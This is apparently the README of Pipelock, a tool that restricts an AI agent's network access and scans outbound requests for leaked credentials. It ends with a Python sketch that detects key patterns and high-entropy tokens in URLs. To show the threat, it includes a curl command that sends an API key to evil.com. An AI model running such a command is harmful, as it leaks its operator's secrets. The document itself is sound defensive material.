Pipelock
All-in-one security harness for AI agents. One binary, zero dependencies. Controls network egress, detects credential exfiltration, scans for prompt injection, and monitors workspace integrity.
If you run Claude Code, OpenHands, or any AI agent with shell access and API keys, this is for you.
The Problem
AI agents run with shell access, API keys in their environment, and unrestricted internet access. A compromised agent can exfiltrate secrets with one HTTP request:
curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY" # game over
The Solution
Pipelock uses capability separation — the agent process (which has secrets) is network-restricted, while a separate fetch proxy (which has NO secrets) handles web browsing. Every request goes through a 7-layer scanner pipeline.
[Diagram: flowchart showing the "Privileged Zone" that contains the AI Agent]
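The curl request under The Problem is what a scanner on the fetch proxy has to catch, and because that proxy holds no secrets it must recognize keys by shape rather than by value. The sketch below is an added example, not Pipelock's code: the patterns, the entropy threshold and the function names are assumptions.

```python
import base64
import math
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Illustrative key shapes (assumed rule set, not Pipelock's own).
SECRET_PATTERNS = [
    re.compile(r"sk-ant-[A-Za-z0-9_-]{20,}"),  # Anthropic-style API key
    re.compile(r"AKIA[0-9A-Z]{16}"),           # AWS access key ID
    re.compile(r"ghp_[A-Za-z0-9]{36}"),        # GitHub personal access token
]
TOKEN = re.compile(r"[A-Za-z0-9+/_-]{32,}")    # long opaque runs worth an entropy check


def shannon_entropy(s):
    """Bits per character; random key material scores high."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


def candidate_strings(url):
    """Yield each URL component, percent-decoded, plus its base64 decoding if any."""
    parts = urlsplit(url)
    fields = [parts.hostname or "", unquote(parts.path), unquote(parts.fragment)]
    fields += [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    for field in fields:
        yield field
        try:  # restore stripped padding, then try URL-safe base64
            padded = field + "=" * (-len(field) % 4)
            yield base64.urlsafe_b64decode(padded).decode("ascii")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            pass


def scan_url(url, entropy_threshold=4.5):
    """Return (kind, detail) findings; an empty list means the request may pass."""
    findings = []
    for text in candidate_strings(url):
        for pattern in SECRET_PATTERNS:
            if pattern.search(text):
                findings.append(("pattern", pattern.pattern))
        for token in TOKEN.findall(text):
            if shannon_entropy(token) >= entropy_threshold:
                findings.append(("entropy", token[:6] + "..."))  # never log the full value
    return findings
```

The hostname is scanned as well because a key can be carried in a subdomain label, where a query-only check would miss it.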